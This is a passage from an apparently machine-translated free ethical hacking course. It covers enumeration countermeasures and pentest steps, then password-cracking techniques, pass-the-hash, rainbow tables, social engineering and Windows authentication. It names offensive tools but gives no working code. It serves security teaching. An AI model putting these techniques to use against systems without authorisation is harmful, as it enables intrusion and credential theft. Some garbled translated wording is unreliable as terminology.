can easily determine valid users in the SMTP server. The attacker can also communicate directly
with the SMTP server through the telnet or netcat indicator.

Tools for SMTP enumeration

The SMTP Email Generator of NetScanTool Pro allows you to test the process of sending an
email message through an SMTP server. You can extract all common parameters from the email
header, including confirmation/urgent indicators. You can register the email session in the log
file and then view the log file that shows the communications between NetScanTools Pro and the
SMTP server.

The NetScanTool Pro email relay check tool allows you to perform a retransmission test by
communicating with an SMTP server. The report includes a record of communications between
NetScanTools Pro and the destination SMTP server.

DNS Enumeration

The attacker performs a DNS zone transfer enumeration to locate the DNS server and the records
of the target organization. Through this process, an attacker gathers valuable network
information, such as DNS server names, host names, machine names, user names and IP
addresses of possible targets. To perform the DNS zone transfer enumeration, you can use tools
such as nslookup, DNSstuff, etc. These tools allow you to extract the same information that an
attacker collects from the DNS servers of the target organization.

To perform a DNS zone transfer, you must send a zone transfer request to the DNS server that
claims to be a client, the DNS server then sends you a part of your database as a zone. This zone
can contain a lot of information about the network, such as IP addresses and more information
about the DNS zone.

Countermeasures for the Enumeration of Systems


You can apply the following countermeasures to prevent information leakage through various
types of enumeration.

Countermeasures for SNMP enumeration


 Remove the SNMP agent or turn off the SNMP service of your system.
 If turning off SNMP is not an option, change the name of the default "public"
community.
 Upgrade to SNMP3, which encrypts passwords and messages.
 Implement the group policy security option called "Additional restrictions for anonymous
connections".
 Restrict access to null session pipelines, null session shares, and IPSec filtering.
 Block access to TCP/UDP ports 161.
 Do not install the Windows administration and monitoring component unless necessary.
 Encrypt or authenticate using IPSEC.

Countermeasures for DNS enumeration

 Configure all name servers so that they do not send DNS zone transfers to untrusted
hosts.
 Check the DNS zone files of the publicly accessible DNS server and make sure that the
IP addresses of these files are not referenced by hostnames that are not public.
 Make sure that the DNS zone files do not contain HINFO or any other registry.
 Provide standard network management contact details in Network Information
 Central databases This helps to avoid war attacks or social engineering.
 Configure the files in the DNS zone to avoid unnecessary information being revealed.

Countermeasures for the SMTP enumeration

 Ignore emails to unknown recipients.


 Do not include the sensitive mail server and the local host information in the mail
responses.
 Disable open relay function Ignore emails to unknown recipients by configuring SMTP
servers.

Countermeasures for LDAP enumeration

 Use NTLM or basic authentication to limit access only to known users.


 By default, LDAP traffic is transmitted without guarantee, use SSL technology to encrypt
traffic.
 Select a different username from your email address and enable account lock.

Countermeasures for SMB enumeration

Common services of exchange or other services not used can be portals for attackers to enter
their security. Therefore, you must disable these services to prevent information leaks or other
types of attacks. If you do not disable these services, then it can be a vulnerable enumeration.
Server Message Block (SMB) is a service designed to provide shared access to files, serial ports,
printers and communications between nodes in a network. If this service is running on your
network, then you will be at high risk of being attacked.

The importance of Enumeration in Pentesting


You must perform all possible enumeration techniques to list as much information about the
goal. To guarantee the full scope of the test, the pentesting is divided into steps. This penetration
test includes a series of steps to obtain the desired information.

1. Find the range of the network: if you want to enter the network of an organization, you
must first know the range of the network. This is because, if you know the range of the
network, you can mask yourself as a user that is within the range and then try to access
the network. Then, the first step in the pentesting of enumeration is to obtain information
about the scope of the network. You can find the network rank of the target organization
with the help of tools like Whois Lookup.
2. Calculate the subnet mask: once you find the range of the target network, then calculate
the subnet mask required for the IP range.
3. Submit to host discovery: find the important servers connected to the Internet using
tools such as Nmap.
4. Scan the ports: it is very important to discover the open ports and close them if they are
not necessary. This is because the open ports are the doors for an attacker to break the
security perimeter of a target. Therefore, perform port scanning to verify the open ports
on the hosts. This can be achieved with the help of tools such as Nmap.
5. Perform DNS Enumeration: Perform a DNS enumeration to locate all DNS servers and
their records. DNS servers provide information such as system names, user names, IP
addresses, etc. You can extract all this information with the help of the Windows utility
nslookup.
6. NetBIOS Enumeration: Perform a NetBIOS enumeration to identify network devices
through TCP/IP and to obtain a list of computers belonging to a domain, a list of shared
resources on individual hosts, policies and passwords
7. Perform SNMP enumeration: perform the SNMP enumeration by consulting the SNMP
server on the network. The SNMP server can reveal information about user accounts and
devices.
8. Perform the enumeration of UNIX/Linux: perform the enumeration using tools such as
Enum4linux. You can use commands like showmount, Finger, rpfinf or (RPC) and
rpcclient, etc. to list the UNIX network resources.
9. Perform the LDAP enumeration: consult the LDAP service, you can list valid user
names, departmental details and address details. You can use this information to perform
social engineering and other types of attacks.
10. Perform the NTP enumeration: to extract information, such as the host connected to the
NTP server, the IP address of the client, the operating system of the client systems, etc.
You can get this information with the help of commands like ntptrace, ntpdc and ntpq.
11. Perform the SMTP Enumeration: to determine valid users in the SMTP server.
12. Document everything found: the last step in each boom test is to document all the
findings obtained during the test. You should analyze and suggest countermeasures so
that your client improves their security.

This module ends here, I hope you have learned the objectives of this module. This course has an
effort and it is free, I would like you to share it in your social networks or hacking forums so that
more people see it, this course will advance until you reach 20 modules at least and will be more
advanced, you can subscribe if you want to know the advanced the course, every 7 days sent an
email informing everything that happens in the blog, see you soon!

Practice: Ethical Hacking Course - Practice 4 - Enumeration of Systems

en.gburu.net

 Home
 Courses
 FREE $10 in DigitalOcean
 about
 contact
 gburu.net

Subscribe
26 February 2018

Ethical Hacking Course - Module 5 - System


Hacking
Ethical Hacking Course, Computer Security

In the previous modules we saw the theory and practice of how to find vital information about an
objective, in module 5 we will talk about the computer attacks that can be carried out against a
target system or network, this module is more typical of systems hacking, it belongs to the phase
of the pentesting where we launch our attacks looking to break the security that our objective has
in search of improving the security of the objective itself, we will also see simulated attacks in a
controlled environment in the practice of this module of the free ethical hacking course.

Full course: en.gburu.net/hack, here you will find all the topics of this free ethical hacking
course, in one place.

Responsibility:
This ethical hacking course is aimed at educational purposes to improve your computer security
skills to plan and design safer networks, does not encourage illegal activities in systems or
networks of third parties, if you commit an illicit activity in a system or network. You will do at
your own risk. If you want to practice and improve your skills in ethical hacking, do it under
systems where you have a legal permit or are yours, I recommend using images of operating
systems installed in virtual machines in a controlled environment.

Agenda: Module 5 - System Hacking

 Objectives of module 5
 Before an IT Attack
 Objectives of an IT Attack
 Password decryption
 The complexity of the password
 Password decoding techniques
o Dictionary attacks
o Brute Force Attacks
o Hybrid attacks
o Syllable attacks
o Rule-based attacks
 Types of password attacks
o Passive attack online
o Active attack online
o Attack offline (Offline)
o Non-electronic attacks
 Passive attack online: Wire Sniffing
 Online passive attack: Man-in-the-Middle and Relay attacks
 Online active attack: Guess passwords
 Active online attack: Trojans, spyware and keyloggers
o Trojan
o Spyware
o Keylogger
 Online active attack: Hash injection attack
 Online active attack: rainbow tables
o rainbow table
o calculate the hash
o comparing the hash
o Tools to create rainbow tables
 Winrtgen
 RainbowCrack
 Online active attack: distributed network attack
o The DNA server interface
o The DNA client interface
o Recommended tool: Elcomsoft
 Non-electronic attacks
o Dumpster diving
o Shoulder surfing
o Eavesdropping
o sniffing of passwords
o Social engineering
o Default passwords
o Password decryption manual
 Microsoft Authentication
o SAM
o NTLM
o Kerberos
o Salting
o NTLM v1 vs SAM vs NTLM v2
 How to protect our password
o 6 good practices, to protect us from the decryption of passwords
 recommended tools, to decrypt passwords
o pwdump7
o fgdump
o L0phtCrack
o Cain & Abel
 Escalation of Privileges
o Privilege escalation: Recommended tools
o Escalation of Privileges: Countermeasures
 Application Execution
o recommended tools
 RemoteExec
 PDQ Deploy
 Spytech SpyAgent (Keylogger)
 Sound Snooper (Audio Spyware)
 Phone Spy
o Countermeasures against the execution of Malware
o Rootkits
 Why a Rootkit?
 Types of Rootkits
 How to detect a Rootkit?
 Countermeasures against Rootkits
 Countermeasures against Rootkits: recommended programs
 McAfee Stinger
 UnHackMe
 Handling the stream (Stream) NTFS
o How to defend against NTFS transmissions
o Recommended tools
 Steganography
 Cover Tracks
o Tools: Auditpol
 The attack on systems in the Pentesting

Objectives of Module 5
In previous modules we saw how an attack gradually approaches a target system or network, first
recognizes its IP, then its open ports and services and then actively enumerates what extra
information can be obtained, but this does not imply that I already perform your attack in this
module of the computer security course we will see the following:

 Before a computer attack


 Objectives of computer attacks
 Password decryption
 How to defend our passwords
 Escalation of privileges
 Detect Rootkits
 Anti Rootkits
 Application execution
 Classification of steganography
 Methods of this analysis
 Attacks with steganography
 Types of Keyloggers and Spywares
 Prevention against Keyloggers and Spywares
 Manipulation of the stream (Stream) NTFS
 Deletion of fingerprints
 The attack of systems in the Pentesting

Before an IT Attack

Before the attacker or the pentester was made or carried out a computer attack, he had to have
collected information, as we saw in the phases of the pentesting. Before starting an audit of the
system to finally launch an effective attack we have to do the following:

 Recognition
The recognition or also called the footprint, is the process of accumulation of data with
respect to a specific network environment. In general, this technique is applied in order to
find ways to get involved in the network environment. Since the fingerprint can be used
to attack a system, it can also be used to protect it. In the recognition phase, the attacker
creates a profile of the target organization, with information such as its range of IP
addresses, namespace and use of the employees' website.

The footprint improves the ease with which systems can be exploited by revealing system
vulnerabilities. The determination of the target and the location of an intrusion is the main step
involved in the footprint. Once the target and location of an intrusion is known, by using non-
intrusive methods, specific information about the organization can be collected.

For example, the organization's website itself can provide biographies of employees or a
personnel directory, which the hacker can use for social engineering to achieve the goal. The
completion of a Whois query on the web provides associated networks and domain names related
to a specific organization.
 Scanning
Scanning is a procedure to identify active hosts in a network, either to evaluate the
security of the network or to attack them. In the recognition phase, the attacker finds
information about the evaluation of the target through their IP addresses which can be
accessed through the Internet. Scanning refers mainly to the identification of systems in a
network and the identification of services that run on each computer.

Some of the scanning procedures, such as port scans and ping sweeps, return information about
the services offered by the active hosts that are active on the Internet and their IP addresses. The
reverse mapping scan procedure returns information about IP addresses that are not assigned to
live hosts, this allows an attacker to make assumptions about feasible addresses.

 Enumeration
Enumeration is the method of intrusive inquiry in evaluating the objective through which
attackers actively collect information, such as lists of network users, routing tables, and
simple network management protocol (SNMP) data. This is significant because the
attacker crosses the target territory to unearth information about the network and users,
groups, applications and banners.

The aim of the attacker is to identify valid user accounts or groups in which he can remain
discreet once the system has been compromised. Enumeration involves making active
connections to the target system or submitting it to direct queries. Normally, an alert and
insurance system will record such attempts. Often, the information collected is what the target
might have made public, such as a DNS address, however, it is possible for the attacker to trip
over a remote IPC share, such as IPC $ in Windows, which can be tested with a null session that
allows listing actions and accounts.

Objectives of an IT Attack

Every criminal commits a crime to achieve a certain objective. Similarly, an attacker can also
have certain objectives behind performing attacks on a system. The following may be some of
the targets of the attackers when committing attacks against a system. The table shows the
objective of an attacker in different stages of hacking and the technique used to achieve that goal.

 Gain access: to gather enough information to get access


 Privilege escalation: to create a privileged user account if the user level is obtained
 Application Execution: to create and maintain backdoor access
 Hide files: to hide malicious files
 Delete fingerprints: to hide the presence of commitment

Password decryption
The decryption of passwords is the process of recovering passwords from data that has been
transmitted by a computer system or stored in it. The purpose of decrypting passwords could be
to help the user to recover a forgotten or lost password, as a preventive measure on the part of the
administrators of the system to look for easy passwords to decipher or it can also be used to
obtain unauthorized access to a system.

Many attempts at computer attacks begin with attempts to decrypt passwords. Passwords are the
key information needed to access a system. As a result, most attackers use password-cracking
techniques to gain unauthorized access to the vulnerable system. Passwords can be decrypted
manually or with automated tools, such as a dictionary or brute force method.

Computer programs that are designed to decipher passwords are the functions of the number of
possible passwords per second that can be verified. Often, users, when creating passwords, select
passwords that are predisposed to break, such as using a pet's name or choosing one that is
simple so they can remember it. Most password-cracking techniques are successful due to weak
or easily accessible passwords.

The complexity of the password

The complexity of the password plays a key role in improving security against decryption
attacks. It is the important element that users must guarantee when creating a password. The
password should not be simple, since simple passwords are prone to attacks. The passwords you
choose should always be complex, long and hard to remember. The password that you are
configuring for your account must comply with the configuration of the complexity requirements
policy.

How to create a secure password in 2018

The password characters must be a combination of alphanumeric characters. The alphanumeric


characters consist of letters, numbers, punctuation marks and mathematical symbols and other
conventional symbols.

Password decoding techniques

Password decryption is the technique used to discover passwords. It is the classic way to obtain
privileges for a computer system or network. The common approach to deciphering a password
is to continually try to guess the password with various combinations until you get the correct
one. There are five techniques to decrypt passwords:

1. Dictionary attacks: in a dictionary attack, a dictionary file is loaded in the cracking


application that runs against user accounts. This dictionary is the text file that contains
several words in the dictionary. The program uses each word present in the dictionary to
find the password. Dictionary attacks are more useful than brute force attacks. But this
attack does not work with a system that uses passphrases.

This attack can be applied in 2 situations:

 In cryptanalysis, it is used to discover the decryption key to get plain text from the
encrypted text.
 In computer security, to avoid authentication and access the computer by guessing
passwords.

Methods to improve the success of a dictionary attack:

 Use the number of dictionaries such as technical dictionaries and foreign dictionaries that
help you recover the correct password
 Use the string manipulation in the dictionary, it means if the dictionary contains the word
"system", then try the string manipulation and use "metsys" and others.

2. Brute Force Attacks: the cryptographic algorithms must be sufficiently hardened to avoid a
brute force attack. The definition as established by RSA: "The exhaustive search of keys or the
search of brute force is the basic technique to test all the possible keys until the correct key is
identified".

When someone tries to produce each and every one of the encryption keys for data until the
necessary information is detected, this is called brute force attack. Until this date, this type of
attack was carried out by those who had sufficient processing power.

The US government once believed (in 1977) that a 56-bit Data Encryption Standard (DES) was
sufficient to deter all brute force attacks, a claim that several groups around the world had tested.

Cryptanalysis is a brute force attack against an encryption of a brute force search in the key
space. In other words, the test of all possible keys is done in an attempt to retrieve the plain text
used to produce a particular ciphertext. Detecting key text or clear text at a faster pace compared
to brute force attack can be considered a way to decrypt encryption. An encryption is safe if there
is no method to break that encryption other than brute force attack. For the most part, all figures
lack a mathematical proof of safety.

If the keys are originally chosen randomly or are randomly searched, the plain text, on average,
will be available after testing half of all the possible keys.

Some of the considerations for brute force attacks are the following:

 It is a slow process
 All passwords will eventually be found
 Attacks against NT hashes are much more difficult than LM hashes
3. Hybrid attack: this type of attack depends on the attack of the dictionary. There are
possibilities for people to change their password simply by adding some numbers to their
previous password. In this type of attack, the program adds some numbers and symbols to the
dictionary words and tries to decrypt the password. For example, if the previous password is
"system", there is a possibility that the person changes it to "systeml" or "system2".

4. Syllable attack: A syllable attack is the combination of a brute force attack and a dictionary
attack. This decryption technique is used when the password is not an existing word. Attackers
use the dictionary and other methods to decipher it. It also uses the possible combination of each
word present in the dictionary.

5. Rule-based attack: This type of attack is used when the attacker obtains information about
the password. This is the most powerful attack because the cracker knows the type of password.
For example, if the attacker knows that the password contains a two- or three-digit number, he
will use some specific techniques and extract the password in less time.

By obtaining useful information, such as the use of numbers, the length of the password and
special characters, the attacker can easily adjust the password recovery time to a minimum and
improve the decryption tool to recover passwords. This technique involves brute force attacks,
dictionary and syllables.

Types of password attacks

Password decryption is one of the crucial stages of hacking a system. The decryption of
passwords used for legal purposes retrieves the forgotten password of a user, if it is used by
illegitimate users for illegal purposes, it can cause them to obtain unauthorized privileges in the
network or the system. Password attacks are classified according to the actions of the attacker to
decrypt a password. Generally, there are four types:

1. Online passive attack: a passive attack is an attack on a system that does not result in a
change in the system in any way. The attack is simply monitor or record data. A passive
attack in a cryptosystem is one in which the cryptanalyst can not interact with any of the
parties involved, trying to break the system based solely on the observed data. There are
three types of online passive attacks:

 Wire sniffing
 Man in the middle
 Replay

2. Online active attack: an active online attack is the easiest way to gain unauthorized access to
the administrator system. There are three types of active attacks online:
 Guess password
 Trojan horse, spyware or keylogger
 Hash injection
 Impersonation (Phishing)

3. Offline Attack: Offline attacks occur when the intruder verifies the validity of the passwords.
He or she observes how the password is stored in the target system. If usernames and passwords
are stored in a readable file, it is easy for the intruder to access the system. To protect your list of
passwords, they must always be kept in an illegible form, which means they must be encrypted.

Offline attacks often consume a lot of time. They are successful because the LM hash are
vulnerable due to a smaller keyboard space and a shorter length.

These attacks can be foreseen in the following way:

 Using good passwords


 Remove LM hash
 Use cryptographically secure methods while representing passwords

There are three types of off-line attacks:

 Hashes pre-calculated
 Distributed network
 Rainbow (Rainbow)

4. Non-electronic attacks: non-electronic attacks are also known as non-technical attacks. This
type of attack does not require any technical knowledge about the methods of intrusion into the
system of another. Therefore, it is called non-electronic attack. There are three types of non-
electronic attacks:

 Spy the victim over his shoulder, while entering the password: (Shoulder surfing)
 Social engineering
 Check the garbage for the password written somewhere (Dumpster diving)

Passive attack online: Wire Sniffing

The Wire Sniffing is to listen on the network to see if a password is transmitted, a packet sniffer
tool is rarely used for an attack. This is because a sniffer can only work in a common collision
domain. The common collision domains are not connected by a switch or bridge. All hosts in that
network are also not switched or bridged in the network segment.
As the crawlers gather packets in the data link layer, they can trap all packets in the LAN of the
machine running the sniffer program. This method is relatively difficult to perpetrate and is
computationally complicated.

This is because a network with a hub implements a broadcast medium that all systems share on
the LAN. Any information sent through the LAN is sent to each and every one of the machines
connected to the LAN. If an attacker runs a sniffer on a LAN system, it can collect data sent to
any other system on the LAN and from it. Most sniffer tools are ideal for sniffing data in a
central environment. These tools are called passive trackers, since they passively wait for the
data to be sent, before capturing the information. They are efficient in the imperceptible
collection of data from the LAN. The captured data can include passwords sent to remote
systems during Telnet, FTP, rlogin sessions and email sent and received. The scented credentials
are used to gain unauthorized access to the target system. There are a variety of tools available
on the Internet for passive cable tracking.

Passive attack online: Man-in-the-Middle y ataques de Relay

When two parties communicate, the man attack in the middle can take place. In this case, a third
party intercepts the communication between the two parties, assuring the two parties that they
are communicating with each other. Meanwhile, the third alters the data or listens and passes the
data along. To accomplish this, the man in the middle has to smell from both sides of the
connection simultaneously. This type of attack is often found in telnet and wireless technologies.
It is not easy to implement such attacks due to the numbers and the speed of the TCP sequence.
This method is relatively difficult to perpetrate and can sometimes be broken by invalidating
traffic.

In a repeating attack (Relay), packets are captured using a sniffer. After extracting the relevant
information, the packages are repositioned in the network. This type of attack can be used to play
bank transactions or other similar types of data transfer in the hope of replicating or changing
activities, such as deposits or transfers.

Online active attack: guess passwords

Everyone knows your username, but your password is a well-kept secret to prevent others from
accessing your transactions.

With the help of dictionary attack methodologies, an intruder tries many means to guess his
password. In this methodology, an attacker takes a set of words and dictionary names, and makes
all possible combinations to obtain their password. The attacker performs this method with
programs that guess hundreds or thousands of words per second. This allows them to try many
variations: words backwards, different capitals, add a digit at the end, etc.
To further facilitate this, the attacking community has created large dictionaries that include
foreign language words or names of things, places and cities modeled to decipher passwords.
Attackers can also scan your profiles to search for words that can break your password. A good
password is easy to remember, but hard to guess, so you must protect your password by making
it appear random when you insert items such as digits and punctuation. The more intricate your
password, the harder it will be for the attacker to break it.

Some of the considerations for guessing passwords are the following:

 It takes a long time to find the correct password


 Requires large amounts of network bandwidth
 Can be easily detected

Active online attack: Trojans, spyware and keyloggers

Trojan is a destructive program that hides as a benign application. Before the installation or
execution, the software initially seems to perform a convenient function, but in practice it steals
information or damages the system. With a Trojan, attackers can have remote access to the target
computer and perform various operations that are limited by the user's privileges on the target
computer, by installing the Trojan.

Spyware is a type of malware that can be installed on a computer to collect information about
computer users without their knowledge. This allows attackers to collect information about the
user or organization secretly. The presence of spyware is usually hidden from the user and can be
difficult to detect.

Keylogger is a program that registers all keystrokes that are written on the computer keyboard
without the knowledge of the user. Once the keystrokes are registered, they are sent to the
attacker or hidden in the machine for later retrieval. The attacker examines them carefully in
order to find passwords or other useful information that can be used to compromise the system.

For example, a keylogger is able to reveal the content of all emails composed by the user of the
computer system in which the keylogger has been installed.

Online active attack: Hash injection attack

A hash injection attack is the concept of injecting a compromised hash into a local session and
then using the hash to authenticate itself to network resources. This attack is carried out
successfully in four steps:

1. The hacker commits a workstation/server using a local/remote exploit.


2. The hacker extracts registered hashes and finds a domain administrator account hash
connected
3. Hackers use the hash to log in to the domain controller
4. The hacker extracts all the hashes in the Active Directory database and can now satirize
any account in the domain.

Online active attack: rainbow tables

Offline attacks occur when the intruder verifies the validity of the passwords. He or she observes
how the password is stored. If user names and passwords are stored in a readable file, it will be
easy for you to access the system. Therefore, the list of passwords must be protected and stored
in an illegible form, such as an encrypted form.

A rainbow attack (Rainbow) is the implementation of the cryptanalytic time-memory exchange


technique. The compensation of time and cryptanalytic memory is the method that requires less
time for cryptanalysis. It uses the already calculated information stored in the memory to
decipher the cryptography. In the rainbow attack, the same technique is used, the password hash
table is created in advance and stored in memory. Such a table is called a "rainbow table".

 A rainbow table is a search table especially used to retrieve the plain text password of an
encryption text. The attacker uses this table to search for the password and tries to
retrieve the password from the hash values of the password.

An attacker calculates the hash to obtain a list of possible passwords and compares it with the
hash table previously calculated (rainbow table). If a match is found, the password is decrypted.

It is easy to recover passwords by comparing hashes of captured passwords with pre-calculated


tables.

Only encrypted passwords should be stored in a file that contains a username / password pairs.
The typed password is encrypted with the hash function of the cryptography during the login
process, and then compared with the password that is stored in the file.

Encrypted passwords that are stored can be useless against dictionary attacks. If the file
containing the encrypted password is in a readable format, the attacker can easily detect the hash
function. He or she can decipher every word in the dictionary using the hash function, and then
compare it with the encrypted password. Therefore, the attacker obtains all the passwords that
are words listed in the dictionary.

Tools to create rainbow tables

 Winrtgen: is a graphical rainbow table generator that helps attackers create rainbow
tables from which they can decipher the hash password. It's compatible with: LM,
FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2,
MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHAl, CiscoPIX, ORACLE,
SHA-2 (256), SHA-2 (384) y SHA-2 (512) hash.
 RainbowCrack is a general proposal implementation that takes advantage of the time
and memory exchange technique to decipher hash. This project allows you to decrypt a
hash password. The rtgen tool in this project is used to generate the rainbow tables.

Online active attack: distributed network attack

A distributed network attack (DNA) is the technique used to recover password protected files. It
uses the unused processing power of machines on the network to decrypt passwords. In this
attack, a DNA administrator is installed in a central location where machines running DNA
clients can access it through the network. The DNA administrator coordinates the attack and
allocates small portions of the key search to machines distributed throughout the network. The
DNA client runs in the background, only taking the unused processor time. The program
combines the processing capabilities of all clients connected to the network and uses them to
perform a file key search to decrypt them.

Characteristics of a distributed network attack:

 Read statistics and graphics easily


 Add user dictionaries to decrypt the password
 Optimizes attacks with passwords for specific languages
 Modify user dictionaries
 Includes the stealth client installation functionality
 Automatically updates the client while updating the DNA server
 Control customers and identify the work done by customers

DNA (Distributed Network Attack) is divided into 2 parts:

1. DNA server interface: allows users to manage the DNA of a server. The DNA server
module provides the user with the status of all jobs that the DNA server is running. This
interface is divided into:

 Current Jobs: The current job queue has all the jobs that the controller has added to the
list. The current job list has many columns, such as the identification number that the
DNA has assigned to the job, the name of the encrypted file, the password that the user
has used, the password that matches a key that can be unlocked. data, the status of the
work and several other columns.
 Completed works: the completed list of works provides information about the works that
can be deciphered including the password. The list of completed jobs also has many
columns that are similar to the current job list. These columns include the identification
number assigned by the DNA to the work, the name of the encrypted file, the decrypted
path of the file, the key used to encrypt and decrypt the file, the date and time that the
DNA server started working on the job, the date and time the DNA server finished
working at the job, the elapsed time, etc.

2. DNA client interface: can be used from many workstations. Customer statistics can be easily
coordinated through the use of the DNA client interface. This interface is available on machines
where the DNA client application has been installed. There are many components, such as the
name of the DNA client, the name of the group to which the DNA client belongs, statistics about
the current job and many other components.

The network traffic application in Windows is used for network management purposes. The
Network Traffic dialog box is used to know the network speed used by the DNA and the length
of each work unit of the DNA client. Using the length of the work unit, a DNA client can work
without contacting the DNA server. The DNA client application has the ability to contact the
DNA server at the beginning and end of the length of the unit of work

The user can control the job status queue and the DNA. When data is collected from the Network
Traffic dialog box, a modification can be made to the client's unit of work. When the length of
the unit of work increases, the speed of network traffic decreases. If the traffic has been reduced,
the work of the client in the works would require a greater amount of time. Therefore, fewer
requests can be made to the server due to the reduction in bandwidth of the network traffic.

Recommended Tools

Elcomsoft Distributed Password Recovery, It allows you to break down complex passwords,
recover strong encryption keys and unlock documents in a production environment. It allows the
execution of mathematically intensive password recovery code in the enormously parallel
computational elements found in modern graphical accelerators. It uses innovative technology to
accelerate password recovery when an ATI or NVIDIA compatible graphics card is present in
addition to the CPU-only mode. When compared to password recovery methods that only use the
main CPU of the computer, the acceleration of the GPU used by this technology makes the
recovery of the password faster. This supports the recovery of passwords from a variety of
applications and file formats

Non-electronic attacks

Non-electronic attacks are also called non-technical attacks. This type of attack does not require
any technical knowledge about the methods of intrusion into the system of another. Therefore, it
is called non-electronic attack. There are four types of non-electronic attacks, which are: social
engineering, spying on the shoulder, sniffing the keyboard and checking the garbage.
Dumpster diving is a key attack method that points to a substantial flaw in IT security: the same
information that people crave, protect and devoutly secure can be achieved by almost anyone
willing to review the garbage of the objective. It allows you to gather information about target
passwords by looking through the trash can. This type of low-tech attack has many implications.

Due to the lower safety of the present, checking garbage was quite popular in the 1980s. The
term "container diving" refers to any useful, general information that is found and taken from
areas where It has been discarded. These areas include trash cans, containers, garbage containers,
and the like, from which you can get information for free. Curious or malicious attackers can
find passwords, manuals, confidential documents, reports, receipts, card numbers credit or
diskettes that have been discarded. The best way to counteract this is to destroy the valuable files
and discard them in an unreadable format for humans.

Simply, the examination of the waste products that have been dumped in the garbage container
areas can be useful for the attackers, and there is ample information to support this concept. This
useful information was thrown without thinking to what hands it could reach. Attackers can use
this data to gain unauthorized access to each other's computer systems, or the objects found can
cause other types of attacks, such as those based on social engineering.

Shoulder surfing is when an intruder is discreetly standing, but near a legitimate user, watching
as the password is entered. The attacker simply looks at the user's keyboard or screen while
logging in, and observes whether the user is looking at the desktop for a password reminder or
the actual password. This can only be possible when the attacker is physically close to the target.

This type of attack can also occur in the pay line of a grocery store when a potential victim is
swiping a debit card and entering the required PIN. Many of these personal identification
numbers have only four digits.

Eavesdropping it refers to the act of secretly listening to someone's conversation. Passwords can
be determined by secretly listening to passwords exchanges. If the computer attacker does not
get your password guessing, there are other ways you can try to get it.

Password Sniffing" It is an alternative used by hackers to obtain their destination passwords.


Most networks use transmission technology, which means that every message that a computer
transmits on the network can be read on all computers connected in that network. In practice,
except the recipient of the message, all other computers will notice that the message is not
intended for them and they will ignore it. However, computers can be configured to look at each
message transmitted by a specific computer on the network. In this way, one can look at the
messages that are not intended for them. The hackers have the programs to do this, and then they
scan all the messages traversed in the network looking for the password.

You can end up giving your password to the attacker if you are logging into a computer through
a network, and some computers on the network have been compromised in this way. By using
this password detection technique, hackers have collected thousands of passwords by entering
connected computers into a widely used network.

Social Engineering in computer security is the term that represents a non-technical type of
intrusion. This usually depends to a large extent on human interaction and often involves tricking
others into breaking normal safety procedures. A social engineer executes a "deception" to break
the security procedures. For example, an attacker who uses social engineering to enter a
computer network will try to gain the trust of someone authorized to access the network and then
try to extract information that compromises the security of the network.

Social engineering is the objective of obtaining confidential information by deceiving or


influencing people. An attacker can misrepresent himself as a user or system administrator to
obtain a user's password. It is natural for people to be useful and trusting. In general, anyone
strives to establish friendly relationships with friends and colleagues. Social engineers take
advantage of this trend.

Another feature of social engineering is based on the inability of people to keep up with a culture
that relies heavily on information technology. Most people are unaware of the value of the
information they have and few are careless when it comes to protecting it. The attackers take
advantage of this fact for the intrusion. Typically, social engineers look for containers of
valuable information. A social engineer would have more difficulty obtaining the combination of
a safe, or even the combination of a gym locker, than a password. The best defense is to educate,
train and raise awareness.

The default passwords, as we saw in previous modules of this computer security course, the
default passwords supplied by manufacturers with new equipment. In general, they remain an
important risk factor.

There are many online sites with information about devices and their default passwords:

 DefaultPassword.info
 DefaultPassword.us
 PasswordsDatabase.com
 router password

The manual decryption of passwords includes the attempt to log in with different passwords.
Guessing is the key element in the manual decryption of passwords. The password is the key
value of the data that is needed to access the system. Most passwords can be deciphered using
different escalation privileges, application execution, file hiding and track coverage. Attackers
attempt many decryption of passwords to gain access to a target's system. Passwords can be
decrypted manually or using some automated tools, methods and algorithms.

Microsoft Authentication

 SAM

The acronym SAM database is the database of the security account administrator. This is used by
Windows to manage user accounts and passwords in the hash format (unidirectional hash),
passwords are never stored in plain text format. They are stored in hash format to protect them
from attacks. The SAM database is implemented as a log file and the Windows kernel obtains
and maintains an exclusive file system lock, this provides some measure of security for the
storage of the passwords.

It is not possible to copy the SAM file to another location in the case of online attacks. Because
the SAM file is locked with an exclusive file system lock, it can not be copied or moved while
Windows is running. The lock will not be released until the blue screen exception has been
thrown or the operating system has shut down. However, by making password hashes available
for off-line brute force attacks, the disk copy of the contents of the SAM file can be downloaded
using various techniques.

Microsoft introduced the SYSKEY function in Windows NT 4.0 in an attempt to improve the
security of the SAM database against decryption of the software without connection. The disk
copy of the SAM file is partially encrypted when SYSKEY is enabled. In this way, the password
hash values for all local accounts stored in the SAM are encrypted with a key.

Even if its content was discovered by some subterfuge, the keys are encrypted with a
unidirectional hash, which hinders its breaking. In addition, some versions have a security key,
which makes the encryption specific for that operating system copy.

 NTLM

NTLM (NT LAN Manager) is a patented protocol used by many Microsoft products to perform
challenge / response authentication, and is the default authentication scheme used by the
Microsoft firewall and proxy server products. This software was developed to address the
problem of working with Java technologies in a Microsoft-oriented environment. As it does not
depend on any official protocol specification, there is no guarantee that it will work correctly in
all situations. It has been in some Windows installation, where it worked successfully. NTLM
authentication consists of two protocols: NTLM authentication protocol and LM authentication
protocol. These protocols use a different hash methodology to store the passwords of the users in
the SAM database.
 Kerberos

Kerberos is a network authentication protocol. It is designed to provide strong authentication for


client / server and applications through the use of secret key cryptography. This provides mutual
authentication. Both the server and the user verify the identity of the other. Messages sent
through the kerberos protocol are protected against replay attacks and illegal eavesdropping.

Kerberos makes use of Key Distribution Center (KDC), a trusted third party. This consists of two
logically distinct parts: authentication server (AS) and a ticket granting server (TGS).

The Kerberos authorization mechanism provides the user with a Ticket Granting Ticket (TGT)
that the servers subsequently authenticate to subsequently access specific services, single sign-on
by which the user is not required to re-enter the password to access the services. services that he
is authorized to use. It is important to keep in mind that there will be no direct communication
between the application servers and the key distribution center (kdc), the service tickets, even if
they are packaged by tgs, will only reach the service through the client that wishes to access
them .

 Salting

It's a way to make passwords safer by adding random character strings to passwords before your
MD5 HASH is calculated. This makes deciphering passwords more difficult. The longer the
random string, the more difficult it will be to break or decrypt the password.

The random string of characters must be a combination of alphanumeric characters. The level of
security or the strength of protection of your passwords against various password attacks
depends on the length of the random string of characters. This defeats pre-calculated hash
attacks.

In cryptography, a salt consists of random bits that are used as one of the inputs for a one-way
function and the other input is a password. Instead of passwords, the result of the unidirectional
function can be stored and used to authenticate users. A salt can also be combined with a
